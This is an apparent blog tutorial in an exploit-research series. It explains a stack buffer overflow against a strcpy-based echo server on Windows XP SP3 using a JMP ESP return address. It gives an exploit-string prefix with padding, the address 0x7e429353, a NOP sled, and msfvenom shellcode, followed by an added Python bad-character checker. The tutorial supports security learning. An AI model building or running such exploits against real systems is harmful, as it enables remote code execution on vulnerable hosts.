Exploit Research — “The JMP ESP”

The Dark Lord
Jul 24, 2022

Overview:

This is a continuation of the exploit research series, check out the blog before this here. For the sake of brevity, I will not reiterate some of the ideas covered earlier like ‘the stack’ or how to generate a payload using ‘msfvenom’ etc since this exploit will be primarily reusing them with some slight modification.

The Exploit — Strcpy on Win XP SP3:

The stack is the section of memory used as a temporary scratchpad where local variables and function call data are stored. Here we will be using the same buffer overflow idea as before, but with a slight change: the function we are trying to exploit filters out some characters, which forces us to change our exploit design.

So what’s different?
We are trying to exploit a remote echo server which uses the ‘strcpy’ function. Though it suffers from the same buffer overflow as the exploit before, strcpy puts certain restrictions on the strings we can send to it. Certain characters are treated as string delimiters, and the function treats them as the end of the string. If any of these characters is present in our exploit, the string will be truncated at that point, and every character beyond it is dropped.
To take this into account, we have to make sure none of these characters appear anywhere in our exploit. Since we are not crafting our own shellcode for this challenge, we can leave the exclusion of these characters to msfvenom and focus on the return address, since that is the only part of the exploit string we supply based on our own deductions.

The first step is to identify these ‘bad characters’. This can be done by sending the exploit string and seeing where the payload gets truncated. The usual culprits are newlines, nulls, tabs etc. (in hex: 0A, 00, 0D).

For the payload we generate using msfvenom, we can have these characters excluded by supplying an extra parameter when generating it: --bad-chars '\x00\x0a\x0d' (the short form is -b).

Though Metasploit does this seamlessly, when we get into the art of writing shellcode ourselves we will explore different techniques to keep bad characters out of it, how to encode it to bypass string-based detection, and how to make it position independent.

Problem solved?
The payload doesn’t have the bad characters anymore, but we aren’t done yet.

In our last exploit we had a hardcoded stack address where our shellcode was located. This would be all dandy, but a wrench is thrown in the works: the stack addresses now contain a null byte (0x00), which is one of our bad characters.

Here we bring in a technique called ‘JMP ESP’. We have our shellcode on the stack, and we need to get execution to that address without hardcoding the shellcode address directly. We can use the JMP instruction to jump to the stack, because the top of the stack is pointed to by the ESP register.

So we overwrite the return address with the address of a “JMP ESP” instruction. When the function returns, execution lands on that instruction, which in turn jumps to the stack, where ESP points at the bytes right after the overwritten return address.

bad MS paint skills, circa 2022

Now we just need to find this instruction within the loaded libraries, and Immunity Debugger (or, in general, any debugger) can help us find the address of this instruction.

We can search for the “JMP ESP” instruction in the debugger and use its address in the exploit.

One of the addresses out of the many results is “7e429353”. Pasting the prefix part of the exploit string below (the shellcode can be generated by msfvenom, appended, and sent over in similar fashion using Python as in the last challenge). Note that the address is written in little-endian byte order, so 7e429353 becomes the bytes 53 93 42 7e.

buf = ""
buf += "A" * 268                 # padding up to the saved return address
buf += "\x53\x93\x42\x7e"        # 0x7e429353 (JMP ESP) in little-endian byte order
buf += "\x90" * 100              # NOP sled, landed on by JMP ESP
buf += shellcode                 # msfvenom output, generated with --bad-chars '\x00\x0a\x0d'
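As an added example (not part of the original post), the following Python script checks the three things the post reasons about by hand: which bytes of an exploit string a strcpy-style copy would keep, whether a candidate payload or address contains any of the bad characters listed above, and why the little-endian encoding of 7e429353 passes the check while a stack address does not. The bad-character set and the address 0x7e429353 come from the post; the stack address 0x0012ff40 is a constructed illustration, not a value taken from the target.

```python
import struct

# Bad characters identified in the post for this target: NUL, LF, CR.
BAD_CHARS = b"\x00\x0a\x0d"


def find_bad_chars(data: bytes, bad: bytes = BAD_CHARS) -> list:
    """Return (offset, byte) pairs for every bad character found in data."""
    return [(i, b) for i, b in enumerate(data) if b in bad]


def strcpy_view(data: bytes) -> bytes:
    """The bytes a C strcpy would actually copy: everything before the first NUL.

    This models only the NUL delimiter, which is strcpy's own rule; LF and CR are
    bad for this target because of how the server handles the string, as the post
    describes, and are covered by find_bad_chars().
    """
    end = data.find(b"\x00")
    return data if end == -1 else data[:end]


def pack_address(addr: int) -> bytes:
    """Encode a 32-bit address in little-endian order, as x86 reads it off the stack."""
    return struct.pack("<I", addr)


def usable_address(addr: int, bad: bytes = BAD_CHARS) -> bool:
    """True when the packed address contains none of the bad characters."""
    return not find_bad_chars(pack_address(addr), bad)


def check_exploit_string(buf: bytes, bad: bytes = BAD_CHARS) -> dict:
    """Summarise what would survive a strcpy copy and where the bad bytes sit."""
    kept = strcpy_view(buf)
    return {
        "sent": len(buf),
        "kept_by_strcpy": len(kept),
        "bad_chars": find_bad_chars(buf, bad),
        "clean": not find_bad_chars(buf, bad),
    }


if __name__ == "__main__":
    # The JMP ESP address from the post packs to the bytes used in its exploit string.
    print(pack_address(0x7E429353))          # b'S\x93B~'  ==  \x53\x93\x42\x7e
    print(usable_address(0x7E429353))        # True

    # A constructed stack address: its top byte is 0x00, so it cannot be used.
    print(pack_address(0x0012FF40))          # b'@\xff\x12\x00'
    print(usable_address(0x0012FF40))        # False

    # A constructed payload with a stray newline in it: strcpy keeps everything,
    # but the bad-character scan still flags offset 5 as a problem.
    sample = b"\x90" * 5 + b"\x0a" + b"\x90" * 3
    print(check_exploit_string(sample))
```

The script reports the problem the post describes, namely the null byte in a stack address, before anything is sent, and the same scan can be run over msfvenom output to confirm that --bad-chars did its job.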
